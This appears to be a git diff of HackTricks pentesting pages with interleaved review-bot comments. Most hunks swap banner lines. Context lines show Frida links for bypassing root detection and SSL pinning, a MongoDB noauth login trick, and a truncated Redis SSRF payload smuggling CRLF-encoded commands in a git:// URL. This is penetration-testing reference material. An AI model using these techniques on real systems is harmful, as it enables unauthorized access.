+[**Fridax**](https://github.com/NorthwaveSecurity/fridax) allows you to easily **modify the .NET binary inside a Xamarin application on runtime**. Static analysis will help you identify different methods present within the application, which can be hooked later for dynamic analysis using Fridax. Below are a few Frida scripts that can help us bypass root detection or SSL-pinning:
+
+* [**xamarin-antiroot**](https://codeshare.frida.re/@Gand3lf/xamarin-antiroot/)
+* [**xamarin-root-detect-bypass**](https://codeshare.frida.re/@nuschpl/xamarin-root-detect-bypass/)
+* [**Frida-xamarin-unpin**](https://github.com/GoSecure/frida-xamarin-unpin)
+
+## References
+
+* [https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers](https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers)
+
+
+
+βοΈ HackTricks Cloud βοΈ -π¦ Twitter π¦ - ποΈ Twitch ποΈ - π₯ Youtube π₯
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+
+
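Review bot: `Xamarin.Essentails.dll` in the paragraph listing the bundled library DLLs is misspelled; the assembly is `Xamarin.Essentials.dll`. The Dynamic Analysis paragraph also carries encoding debris (`wonβt`, `thereβs`) where plain apostrophes belong, and its second sentence reads "using Burp as a system, CA should work", which should be "using Burp as a system CA should work". Two places refer to screenshots ("From the above screenshot of listing the dll files") but the hunk carries only blank lines there, so the image embeds look missing; the `xamarin-decompress.py` fence has no language tag, and the footer banner line has the same garbled emoji problem.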
diff --git a/network-services-pentesting/135-pentesting-msrpc.md b/network-services-pentesting/135-pentesting-msrpc.md
index c8d47ace4..74fe054ec 100644
--- a/network-services-pentesting/135-pentesting-msrpc.md
+++ b/network-services-pentesting/135-pentesting-msrpc.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
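Review bot: the removed and added lines in this hunk are both blank as shown, so the substantive change is not reviewable from the diff; the same one-line swap next to the `**HackenProof is home to all crypto bug bounties.**` banner repeats in every remaining file of this commit. Please state in the commit message what is being replaced on those lines (for example which `.gitbook/assets` image is now referenced, since several of those assets are added or rewritten in this same commit) so the new paths can be checked against the tree.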
@@ -112,7 +112,7 @@ The **rpcdump.exe** from [rpctools](https://resources.oreilly.com/examples/97805
β
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/network-services-pentesting/27017-27018-mongodb.md b/network-services-pentesting/27017-27018-mongodb.md
index c73b6fc8b..2bf2de377 100644
--- a/network-services-pentesting/27017-27018-mongodb.md
+++ b/network-services-pentesting/27017-27018-mongodb.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -129,7 +129,7 @@ The tool [https://github.com/andresriancho/mongo-objectid-predict](https://githu
If you are root you can **modify** the **mongodb.conf** file so no credentials are needed (_noauth = true_) and **login without credentials**.
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/network-services-pentesting/5985-5986-pentesting-winrm.md b/network-services-pentesting/5985-5986-pentesting-winrm.md
index 18995f06b..22967bfa5 100644
--- a/network-services-pentesting/5985-5986-pentesting-winrm.md
+++ b/network-services-pentesting/5985-5986-pentesting-winrm.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -167,7 +167,7 @@ winrm quickconfig
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
```
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -338,7 +338,7 @@ Entry_2:
β
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/network-services-pentesting/6000-pentesting-x11.md b/network-services-pentesting/6000-pentesting-x11.md
index af1d16c0c..9b1cbc0a3 100644
--- a/network-services-pentesting/6000-pentesting-x11.md
+++ b/network-services-pentesting/6000-pentesting-x11.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -172,7 +172,7 @@ Now as can be seen below we have complete system access:
* `port:6000 x11`
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/network-services-pentesting/6379-pentesting-redis.md b/network-services-pentesting/6379-pentesting-redis.md
index 084fe508e..fb31f0497 100644
--- a/network-services-pentesting/6379-pentesting-redis.md
+++ b/network-services-pentesting/6379-pentesting-redis.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -154,7 +154,7 @@ HGET
**Dump the database with npm**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/)
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -340,7 +340,7 @@ git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agit
_For some reason (as for the author of_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _where this info was took from) the exploitation worked with the `git` scheme and not with the `http` scheme._
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
index 7e0deb558..851e91d88 100644
--- a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
+++ b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -186,7 +186,7 @@ curl http://127.0.0.1:80
* [https://academy.hackthebox.com/module/145/section/1295](https://academy.hackthebox.com/module/145/section/1295)
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
index 90f83c929..eba355e1f 100644
--- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
+++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -388,7 +388,7 @@ It's possible to **load a .NET dll within MSSQL with custom functions**. This, h
There are other methods to get command execution, such as adding [extended stored procedures](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [CLR Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [SQL Server Agent Jobs](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15), and [external scripts](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql).
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -541,7 +541,7 @@ You probably will be able to **escalate to Administrator** following one of thes
β
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/network-services-pentesting/pentesting-ntp.md b/network-services-pentesting/pentesting-ntp.md
index 9695b0306..f68ec87bf 100644
--- a/network-services-pentesting/pentesting-ntp.md
+++ b/network-services-pentesting/pentesting-ntp.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -99,7 +99,7 @@ Entry_2:
β
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/pentesting-web/content-security-policy-csp-bypass/README.md b/pentesting-web/content-security-policy-csp-bypass/README.md
index d0bd92c75..493c9407e 100644
--- a/pentesting-web/content-security-policy-csp-bypass/README.md
+++ b/pentesting-web/content-security-policy-csp-bypass/README.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -476,7 +476,7 @@ img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev http
Trick from [**here**](https://ctftime.org/writeup/29310).
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -611,7 +611,7 @@ If you know how to exfiltrate info with WebRTC [**send a pull request please!**]
β
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/pentesting-web/csrf-cross-site-request-forgery.md b/pentesting-web/csrf-cross-site-request-forgery.md
index 3dcb323b9..d4da9fa39 100644
--- a/pentesting-web/csrf-cross-site-request-forgery.md
+++ b/pentesting-web/csrf-cross-site-request-forgery.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -190,7 +190,7 @@ To set the domain name of the server in the URL that the Referrer is going to se